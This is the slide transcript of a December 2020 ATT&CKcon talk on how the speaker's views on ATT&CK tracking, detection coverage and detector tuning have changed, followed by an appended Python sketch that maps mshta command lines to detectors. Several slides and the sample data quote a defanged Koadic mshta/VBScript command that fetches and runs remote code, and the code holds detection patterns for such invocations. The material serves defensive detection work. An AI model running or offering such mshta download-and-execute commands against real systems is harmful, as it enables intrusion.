
From Theory to Practice: How My ATT&CK Perspectives Have Changed

From MITRE ATT&CKcon Power Hour December 2020

By Katie Nickels, Director of Intelligence, Red Canary

Good analysts (and good human beings) change their minds based on new information. In this presentation, Katie will share how her perspectives on ATT&CK have changed since moving from ATT&CK team member to ATT&CK end-user. She will discuss how her ideas about coverage, procedures, and detection creation have evolved and why those perspectives matter. Katie will also share practical examples from observed threats to help explain the nuances of her perspectives. Attendees should expect to leave this presentation with a better understanding of how to handle challenges they’re likely to face when navigating their own ATT&CK journey.

Slide transcript: From Theory to Practice: How My ATT&CK Perspectives Have Changed

  1. From Theory to Practice: How My ATT&CK® Perspectives Have Changed. Katie Nickels, ATT&CKcon Power Hour, December 11, 2020.
  2. Yes, this is being recorded. Yes, the slides will be shared. No, I don’t know when. Soon.
  3. About Me: Katie Nickels, Director of Intelligence, Red Canary, @LiketheCoins
     • Former MITRE ATT&CK Team Member (relevant)
     • SANS Certified Instructor for FOR578: Cyber Threat Intelligence
     • Bringing context about threats to inform decisions
     • Maintaining sanity with exercise, chocolate, containers, and holiday lights
  4. Different perspectives help you think differently.
  5. How I've thought differently about ATT&CK:
     1. Tracking tactics, techniques, and procedures
     2. Defining detection coverage
     3. Choosing what to detect
  6. Thinking through TTPs
  7. Tracking TTPs the MITRE way (https://attack.mitre.org/techniques/T1218/005/)
     • Tactic: Defense Evasion
     • Technique/Sub-technique: Signed Binary Proxy Execution: Mshta
     • Procedure: Koadic can use MSHTA to serve additional payloads.[13]
  8. A Koadic detection at Red Canary. Procedure... so what’s this?
  9. We want to track things beyond TTPs: Tactics, Techniques/Sub-techniques, Procedures, Observables
  10. Example of tracking beyond TTPs
     • Tactic: Defense Evasion/Execution
     • Technique: T1218.005 Signed Binary Proxy Execution: Mshta
     • Procedure: Koadic used VBScript to launch mshta.exe and make an external network connection
     • Observable: C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
  11. Threat profile breakdown
     • Primary Tactic: Execution
     • Additional Tactics: TA0005 Defense Evasion
     • Techniques: T1218.005 Signed Binary Proxy Execution: Mshta; T1059.005 Command and Scripting Interpreter: Visual Basic
     • Procedure: Koadic uses VBScript to launch mshta.exe and make an external network connection.
     • Observable (★): C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close)
     • Detectors (Name / Targeted to this profile?): WIN-MSHTA-CLI-URL / No; WIN-MSHTA-NON-HTA / No; WIN-MSHTA-INLINE-VBSCRIPT / No
  12. What this format lets us do
     • Track detailed observables from endpoint telemetry
     • Identify where we have detection coverage (or not)
     • Use ATT&CK tactics, techniques, and sub-techniques ...but add on because it meets our needs
  13. Defining detection coverage
  14. Defining coverage by confidence (https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf)
  15. The challenge of unlimited procedures: “You should also remember that each ATT&CK technique may have many procedures for how an adversary could implement it — and because adversaries are always changing, we can’t know what all those procedures are in advance.” (https://medium.com/mitre-attack/how-to-be-a-savvy-attack-consumer-63e45b8e94c9)
  16. Katie: “There are unlimited procedures!”
     • Matt: “But are there?”
       • Think of techniques like MSHTA
       • Commands only have so many flags
     • We may be able to scope some technique variations
  17. Defining detection coverage by variations
  18. Adding in variations: Tactics → Techniques/Sub-techniques → Variations → Procedures → Observables. Variations are specific options made available to an attacker as defined by the technical components involved that comprise a technique (working definition).
  19. Nine known variations for HTA (https://redcanary.com/blog/threat-research-questions)
     1. HTA can have any file name and extension
     2. Specifying a URI from where HTA content is first downloaded
     3. Use of scripting engines
     4. Specifying protocol handlers (e.g., “vbscript”, “javascript”, “about”)
     5. HTA content embedded and executed from within other file formats
     6. HTA content can be executed remotely via UNC paths
     7. Remote HTA execution via COM interface (lateral movement)
     8. HTA execution by double clicking or invoking with “explorer.exe foo.hta”
     9. Full control over the path and filename of mshta.exe and rundll32.exe
  20. Adding in variations
     • Tactic: Defense Evasion/Execution
     • Technique: T1218.005 Signed Binary Proxy Execution: Mshta
     • Variations: Specifying protocol handler + direct download from URI
     • Procedure: Koadic used VBScript to launch mshta.exe and make an external network connection
     • Observable: C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
  21. Mix and match the variations (https://github.com/redcanaryco/AtomicTestHarnesses/tree/master/TestHarnesses/T1218.005_Mshta)
     • Specifying protocol handler: vbscript:
     • Direct download from URI: mshta hxxp[:]//8.8.8[.]8:123/
     • Specifying protocol handler: jscript:
  22. Testing known variation combinations for T1218.005 Signed Binary Proxy Execution: Mshta: 25 tested combinations (more granular) versus 1 technique (less granular)
  23. Defining detection coverage by threat observables
  24. Remember that profile breakdown?
     • Techniques: T1218.005 Signed Binary Proxy Execution: Mshta; T1059.005 Command and Scripting Interpreter: Visual Basic
     • Procedure: Koadic uses VBScript to launch mshta.exe and make an external network connection.
     • Observable: C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close)
     • Detectors (Name / Targeted to this profile?): WIN-MSHTA-CLI-URL / No; WIN-MSHTA-NON-HTA / No; WIN-MSHTA-INLINE-VBSCRIPT / No
  25. Mapping coverage based on threats: 6 threat observables for Mshta (Koadic observable 1, Koadic observable 2, FIN7 observable 1, FIN7 observable 2, Kovter observable 1, Lazarus observable 1; more granular) versus 1 technique, T1218.005 Signed Binary Proxy Execution: Mshta (less granular)
  26. So how should we explain detection coverage?
  27. Explaining to leadership: This is okay!
  28. Diving deeper: These are okay too! (Mshta threat observables: Koadic observable 1, Koadic observable 2, FIN7 observable 1, FIN7 observable 2, Lazarus observable 1; HTA test harness results)
  29. Expressing coverage is just tough
     • Any way you express it will have limitations
     • There’s no “right” or “wrong” way to do it ...but there may be “better” ways for your needs
     • Figure out the requirement for what you’re doing
       • What are you trying to convey and achieve?
       • What’s your goal of expressing the coverage?
  30. Choosing what to detect
  31. Finding “good” detection opportunities (https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/)
     • Not everything is useful for detection
     • Choosing is most of the battle
  32. Discovery techniques (https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf)
     • “Discovery techniques aren’t that useful for detection”
  33. “...except when they are”: Domain Trust Discovery with nltest
  34. Testing & tuning is most of the work (https://redcanary.com/blog/tuning-detectors/)
     • “This should NEVER happen in an environment, let’s write a detection analytic!” —Me in January 2020
     • “Here’s a hypothesis that will probably be noisy so here are five ways to tune it when that happens.” —Me in December 2020
     • If an analytic is noisy…how can we tune it?
       • Narrow it down? Use threat intelligence.
       • Easily suppress on false positives?
  35. In closing
  36. Takeaways
     • Don’t limit yourself to just TTPs if you need to go further
     • Define detection coverage based on your requirements
     • Trial, error, and experience will help you choose what to detect
     • It’s a good thing to change your perspectives
     • Surrounding yourself with new people and new situations lets you think differently and mature
  37. Thank you! Katie Nickels, @RedCanary, @LiketheCoins, https://redcanary.com/blog/
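The profile format (slides 10-12) and the variation layer (slides 18-22) can be wired together in code: tag an mshta command line with the variations it exhibits, check which detectors fire, and report coverage per variation rather than per technique. This is an added example, not Red Canary's tooling; the detector names are the ones on slide 11, but the condition behind each detector and the variation labels are assumptions.

```python
import re

# Constructed telemetry: the Koadic observable from the slides (defanged exactly as
# shown there), plus two other mshta invocations for contrast.
SAMPLE_EVENTS = [
    r'C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)',
    r"C:\Windows\system32\mshta.exe C:\Users\alice\report.hta",
    r"C:\Windows\system32\mshta.exe javascript:close()",
]

HANDLER = re.compile(r"\b(vbscript|javascript|jscript|about):", re.I)
URI = re.compile(r"\b(?:https?|hxxps?)\[?:\]?//", re.I)  # accepts live and defanged URLs
HTA_FILE = re.compile(r"\.hta\b", re.I)

def variations(cmdline: str) -> set:
    """Tag a command line with the slide-19 variations it exhibits (labels assumed)."""
    tags = set()
    m = HANDLER.search(cmdline)
    if m:
        tags.add("protocol handler:" + m.group(1).lower())
    if URI.search(cmdline):
        tags.add("direct download from URI")
    if not HTA_FILE.search(cmdline):
        tags.add("non-HTA argument")
    return tags

# Detector names come from slide 11; the condition behind each is an assumption.
DETECTORS = {
    "WIN-MSHTA-CLI-URL": lambda t: "direct download from URI" in t,
    "WIN-MSHTA-NON-HTA": lambda t: "non-HTA argument" in t,
    "WIN-MSHTA-INLINE-VBSCRIPT": lambda t: "protocol handler:vbscript" in t,
}

def fired(cmdline: str) -> set:
    """Names of detectors whose condition matches the command line."""
    tags = variations(cmdline)
    return {name for name, cond in DETECTORS.items() if cond(tags)}

def coverage(events) -> dict:
    """Per variation seen in the events: True if at least one detector fires on an
    event showing it. Note a variation can count as covered only incidentally,
    e.g. the javascript handler below is caught by NON-HTA, not by a handler check."""
    result = {}
    for cmd in events:
        hit = bool(fired(cmd))
        for tag in variations(cmd):
            result[tag] = result.get(tag, False) or hit
    return result

if __name__ == "__main__":
    for cmd in SAMPLE_EVENTS:
        print(sorted(fired(cmd)), "<-", cmd[:60])
    print(coverage(SAMPLE_EVENTS))
```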
